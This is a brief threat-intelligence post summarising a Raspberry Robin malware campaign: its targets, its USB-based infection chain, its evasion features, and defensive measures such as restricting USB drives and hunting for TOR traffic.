Researchers at Trend Micro recently reported on a new Raspberry Robin campaign, tracked by Microsoft as Dev-0856, primarily attacking telecommunications and government office systems in Argentina, Australia, Mexico, Croatia, Italy, Brazil, France, India, and Colombia since September 2022. The malware has been increasingly deployed by a wide variety of threat groups as a loader in order to deliver payloads. These payloads include ransomware such as LockBit and Clop.
The primary attack vector has been infected USB drives which download a malicious MSI installer file that deploys the primary payload. Either msiexec.exe or wmic.exe are utilized as trusted installers. Some UBS drives have a configured autorun.inf file that will automatically run the payload, whereas others rely on social engineering to invite a targeted user to click on an associated .LNK file. The payload loader now deploys a decoy adware named BrowserAssistant in order to confuse detection and analysis efforts, as well as advanced sandbox, analysis detection evasion, and obfuscation features which include six layers of packing.
Organizations can defend around this threat by monitoring or restricting the use of USB drives. User education to avoid unsolicited USB drives, or drives from untrusted sources, is a key administrative security control. In addition, the malware has a number of features which lend themselves to custom detections that incorporate an organization’s unique baseline of activity. For example, Raspberry Robin typically uses the TOR network as a C2 network after installation, and as noted above, typically deploys a rogue MSI installer file which makes a connection to a domain in order to evade defenses. Binary Defense’s Threat Hunting services can assist with this type of defense in depth approach.